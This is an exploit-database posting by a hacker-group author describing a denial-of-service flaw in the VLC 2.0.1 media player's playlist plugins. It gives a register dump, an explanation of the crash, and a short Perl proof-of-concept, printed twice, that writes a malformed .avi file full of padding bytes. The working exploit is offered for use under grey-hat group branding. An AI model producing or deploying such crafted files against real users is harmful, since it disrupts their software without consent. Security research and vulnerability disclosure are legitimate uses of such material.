1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 0 1 1 dark-puzzle[at]live[at]fr 0 0 ========================================== 1 1 Pentesting/exploit coding/bug research 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 [0day Exploits] Allah , Alwatan , Almalik .[0day Exploits] # Exploit Title: VLC 2.0.1 - .avi playlist plugins DoS (Explanation + PoC) . # Author: Dark-Puzzle . # Danger : Medium . # Category :Local Exploit . # Version: Latest ; 2.0.1 And 2.0.1 Twoflower (Previous versions are not tested but Maybe Vulnerable) # Vendor : www.videolan.org # Software Link : http://www.videolan.org/vlc/releases/2.0.1.html (Latest Version) # Date: 26 June 2012 . --------------------------------------------------------------------------- Understanding the Exploit : Executing a .avi file created with the script below causes a DoS of the Playlist Plugins , so the playlist stop running . Clicking to play another media in the playlist or trying to Play/Pause/Stop doesn't work anymore . So The program Should be restarted . The issue is that the return adress to the plugins files in windows and VLC DLL in the stack (from 01EFF8BC to 01EFF9B8 [in my case] ) are facing a problem when filling ASCII + the hex code in the avi file . Registers : EAX 00000000 ECX 00000000 EDX 00000000 EBX 000005FA ESP 01EFF8BC EBP 01EFF8C0 ESI 01EFFB40 EDI 01475FF8 EIP 653FCF0F ---------------------------------------- LastErr ERROR_PATH_NOT_FOUND (00000003) ---------------------------------------- playlist plugin DLLs : libmpc_plugin.dll libsid_plugin.dll libxa_plugin.dll ... ---------------------------------------- We can find some return adresses refering to the playlist in the stack after openning the .avi file . So I've tried to create a file with a lib return adress with some nops and INT3's (not avalaible here) , and I've found that the DoS attack stops the playlist plugins from doing what they should do and making the program lose the playlist plugins paths even after loading them .As a result , you can't neither play any medias while the .avi file is in the playlist , nor play/pause/stop . ---------------------------------------- Exploitation ( PoC ) : #!/usr/bin/perl my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; my $d = "\x41" x 500429 ; my $file = "dark.avi"; open ($File, ">$file"); print $File $h,$d; close ($File); ----------------------------------------------------------------------------------------------- Dark-Puzzle (Souhail) . \x90 Follow me : fb.me/dark.puzzle \x90 Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army \x90 Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers.... \x90 Pentesting is my LIFE . GREY HAT Mercy From M0rocC0 . my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; my $d = "\x41" x 500429 ; my $file = "dark2.avi"; open ($File, ">$file"); print $File $h,$d; close ($File);